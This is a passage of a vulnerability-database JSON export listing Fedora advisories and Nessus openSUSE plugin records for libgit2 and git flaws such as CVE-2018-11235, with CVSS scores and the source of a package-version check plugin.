", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-16T11:41:13", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.7-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-16T11:41:13", "id": "FEDORA:DB3A56048699", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PKRWJ6IUL2V32F67UNPFRHEF5LEVL2IZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-09T05:26:13", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.8-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-11-09T05:26:13", "id": "FEDORA:59FDC63352B3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RWUYSQIRNA7BF3QIFK765ETPFQ6URXAE/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-09T05:56:41", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.8-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-11-09T05:56:41", "id": "FEDORA:813D86150C93", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WDTYHGBY3SFDXNHSJNH54FQEMJJLUZOI/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-05T15:18:51", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.4-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-07-05T15:18:51", "id": "FEDORA:6946D6030B23", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JJ2UTQMKUC5NNGLZTBPGXZE5SO6TSRZ7/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-05T18:39:01", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.4-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-07-05T18:39:01", "id": "FEDORA:6DD556015F7B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/AN3BUPV64POHW6JZCR2ILD4YRIHHKEEQ/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T12:06:15", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.1-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-06-01T12:06:15", "id": "FEDORA:8C7D36068732", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/IZDKYTV3LSCNQMBQXEHWGWIWGJUILTTE/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-10T22:47:45", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-10T22:47:45", "id": "FEDORA:59E4260A442B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6H7PLJSU6HD57BAZTTAYHPWURRSQKM6V/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T12:21:29", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: git-2.14.4-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-06-01T12:21:29", "id": "FEDORA:B74CE60CFC7A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MWKTL7J5P3OQER7IUHIJXFASGGZMYKI5/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-19T15:50:55", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: git-2.14.5-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-19T15:50:55", "id": "FEDORA:B126C60E1762", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/D4P3N2PXTUEO4ANXPE6ILEE565P22K5N/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-28T02:46:33", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.2-2.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-19486"], "modified": "2018-11-28T02:46:33", "id": "FEDORA:360A46406863", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SIQD4R3AXAVLC7I56GWWF23JHSCDSW2J/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:28:10", "description": "This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out of bound read, allowing to read the base object, which could be exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta file, which could be exploited by an attacker to cause a denial of service (DoS) 
(bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libgit2 (openSUSE-2019-638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-26", "p-cpe:/a:novell:opensuse:libgit2-26-32bit", "p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-26-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-638.NASL", "href": "https://www.tenable.com/plugins/nessus/123276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-638.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123276);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2019-638)\");\n script_summary(english:\"Check for the openSUSE-2019-638 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn\n leads to an out of bound read, allowing to read the base\n object, which could be exploited by an attacker to cause\n denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading\n a binary delta file, which could be exploited by an\n attacker t ocause a denial of service (DoS)\n (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which\n could occur with a crafted .gitmodules file\n (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when\n processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-debugsource-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-devel-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-26 / libgit2-26-32bit / libgit2-26-32bit-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2021-08-19T12:31:26", "description": "This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out of bound read, allowing to read the base object, which could be exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta file, which could be exploited by an attacker to cause a denial of service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-08-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libgit2 (openSUSE-2018-922)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-26", "p-cpe:/a:novell:opensuse:libgit2-26-32bit", "p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-26-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-922.NASL", "href": "https://www.tenable.com/plugins/nessus/112139", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-922.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(112139);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2018-922)\");\n script_summary(english:\"Check for the openSUSE-2018-922 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 to version 0.26.5 fixes the following issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn\n leads to an out of bound read, allowing to read the base\n object, which could be exploited by an attacker to cause\n denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading\n a binary delta file, which could be exploited by an\n attacker t ocause a denial of service (DoS)\n (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which\n could occur with a crafted .gitmodules file\n (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when\n processing smart-protocol 'ng' packets (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the 
